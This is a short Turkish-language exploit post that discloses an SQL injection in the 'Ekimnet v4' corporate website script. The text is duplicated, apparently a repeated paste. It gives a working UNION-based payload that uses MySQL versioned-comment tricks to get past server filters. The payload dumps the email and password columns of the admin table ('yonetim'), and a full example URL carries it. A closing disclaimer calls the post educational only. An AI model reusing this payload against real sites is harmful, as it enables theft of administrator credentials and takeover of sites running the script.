Selamlar
Ekimnet v4 Kurumsal firma script yazılımında bulduğum SQL injection:
SQL Injection için gerekli veri Sef-URL şeklinde yapılandırılmıştır.
İlgili Script: https://ekimnet.com/ucretsiz-kurumsal-firma-scripti-v4-cikti
Script içerisinde sql injection önlemi yok lakin bazı sunucuların sıkılaştırılması sonucu hata verebilir. Ben de bypass kodu paylaşıyorum.
Örnek localhost çalıştırdım ve çıktısı:
Sayfaya normal ulaşmak için URL.
Sayfaya SQL Injection ile veri çekilmek amacıyla ulaşmak için URL:
Not: Tamamen eğitim amaçlı bir dökümandır. Yasadışı işlemler sonucu oluşabilecek hiçbir sorumluluğu kabul etmemekteyim.
Ekimnet v4 Kurumsal firma script yazılımında bulduğum SQL injection:
SQL Injection için gerekli veri Sef-URL şeklinde yapılandırılmıştır.
İlgili Script: https://ekimnet.com/ucretsiz-kurumsal-firma-scripti-v4-cikti
Script içerisinde sql injection önlemi yok lakin bazı sunucuların sıkılaştırılması sonucu hata verebilir. Ben de bypass kodu paylaşıyorum.
a'+/*!50000unioN*/+/*!50000seLect*/+/*!1,grouP_concat(email,0x0a,pass),3,4,5*/+/*!50000froM*/+/*!50000yonetim*/--+Örnek localhost çalıştırdım ve çıktısı:
Sayfaya normal ulaşmak için URL.
http://localhost/kurumsal4/sayfa/neden-gergi-tavanSayfaya SQL Injection ile veri çekilmek amacıyla ulaşmak için URL:
http://localhost/kurumsal4/sayfa/neden-gergi-tavana'+/*!50000unioN*/+/*!50000seLect*/+/*!1,grouP_concat(email,0x0a,pass),3,4,5*/+/*!50000froM*/+/*!50000yonetim*/--+Not: Tamamen eğitim amaçlı bir dökümandır. Yasadışı işlemler sonucu oluşabilecek hiçbir sorumluluğu kabul etmemekteyim.
